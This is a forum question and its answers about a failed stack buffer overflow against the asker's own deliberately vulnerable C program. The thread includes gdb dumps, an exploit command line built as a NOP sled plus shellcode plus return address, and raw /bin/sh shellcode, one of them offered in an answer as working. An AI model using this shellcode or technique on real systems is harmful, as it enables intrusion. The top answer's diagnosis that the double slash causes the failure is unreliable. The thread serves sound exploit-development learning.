# Buffer Overflow not working?

Tags: exploit, buffer-overflow

Basically I am trying to exploit a buffer overflow, but unfortunately I am not able to get shell.

Script **buf.c**:

```
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
    char buf[500];
    strcpy(buf, argv[1]);
    printf("Entered: %s\n", buf);
    return 0;
}
```

compiling as below:

```
gcc -g buf.c -o buf --no-stack-protector
```

so precisely the `$ebp` gets to be overflown by 516 bytes, how did I figured it out you say? below:

**gdb:**

```
run $(python -c "print('A'*516)")
```

starting from **500 bytes** until I get `0x41414141`:

```
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
```

the start point of `buffer` in `$esp` is **0xbffff02c** :

below is how I figured it out:

```
(gdb) disass main
 Dump of assembler code for function main:
 0x0804844d <+0>:   push   %ebp
 0x0804844e <+1>:   mov    %esp,%ebp
 0x08048450 <+3>:   and    $0xfffffff0,%esp
 0x08048453 <+6>:   sub    $0x210,%esp
 0x08048459 <+12>:  mov    0xc(%ebp),%eax
 0x0804845c <+15>:  add    $0x4,%eax
 0x0804845f <+18>:  mov    (%eax),%eax
 0x08048461 <+20>:  mov    %eax,0x4(%esp)
 0x08048465 <+24>:  lea    0x1c(%esp),%eax
 0x08048469 <+28>:  mov    %eax,(%esp)
 0x0804846c <+31>:  call   0x8048320 <strcpy@plt>
 0x08048471 <+36>:  lea    0x1c(%esp),%eax
 0x08048475 <+40>:  mov    %eax,0x4(%esp)
 0x08048479 <+44>:  movl   $0x8048520,(%esp)
 0x08048480 <+51>:  call   0x8048310 <printf@plt>
 0x08048485 <+56>:  mov    $0x0,%eax
 0x0804848a <+61>:  leave  
 0x0804848b <+62>:  ret    
End of assembler dump.
```

so I made a break point at `break *0x08048475`

and then ran the program as:

```
run $(python -c "print('A'*516)")
```

and then:

```
(gdb) x/200wx $esp

   0xbffff010:  0xbffff02c  0xbffff436  0x00000001  0x00000000
   0xbffff020:  0x00000001  0xb7fdc1b0  0xb7fff000  0x41414141
   0xbffff030:  0x41414141  0x41414141  0x41414141  0x41414141
   0xbffff040:  0x41414141  0x41414141  0x41414141  0x41414141
   0xbffff050:  0x41414141  0x41414141  0x41414141  0x41414141
   0xbffff060:  0x41414141  0x41414141  0x41414141  0x41414141
   0xbffff070:  0x41414141  0x41414141  0x41414141  0x41414141
   0xbffff080:  0x41414141  0x41414141  0x41414141  0x41414141

   ... more
```

as you can see the start point of `buffer` is **0xbffff02c**.

my shellcode is:

```
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a
\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68
```

got it from: http://shell-storm.org/shellcode/files/shellcode-904.php

which is 34 bytes

so 516-34 = 482

and finally the exploit:

```
run $(python -c "print('\x90'*482+'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'+'\x2c\xf0\xff\xbf')")
```

and I get:

> Starting program: /home/pt/buf $(python -c "print('\x90'*482+'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'+'\x2c\xf0\xff\xbf')")
>   Entered: ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������0�/�xF0�I�'�Q7�/bin//sh,���
>
> Program received signal SIGSEGV, Segmentation fault.
>   0x68732f2f in ?? ()

Unfortunately no shell :(

my linux version: `Linux BackboxPTv1 3.11.0-15-generic #23~precise1-Ubuntu SMP Tue Dec 10 16:43:53 UTC 2013 i686 i686 i686 GNU/Linux`

Comment: Have you disabled ASLR and NX? Modern buffer overflow protections are actually pretty good. This U&L post should help a lot: https://unix.stackexchange.com/questions/66802/disable-stack-protection-on-ubuntu-for-buffer-overflow-without-c-compiler-flags

Answer (score 2):

looking at the result of your shellcode:

> �xF0�I�'�Q7�/bin//sh,���

why are there two // after bin . normally it should be /bin/sh,���

I tried your code with another shellcode and it worked.

try with this one. it's 46 bytes

```
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
```

Answer (score 0):

Outside of gdb memory addresses change. There might ASLR protection and because of it the address you try to access from within gdb is invalid now. Or if NX is enabled your stack is not executable at all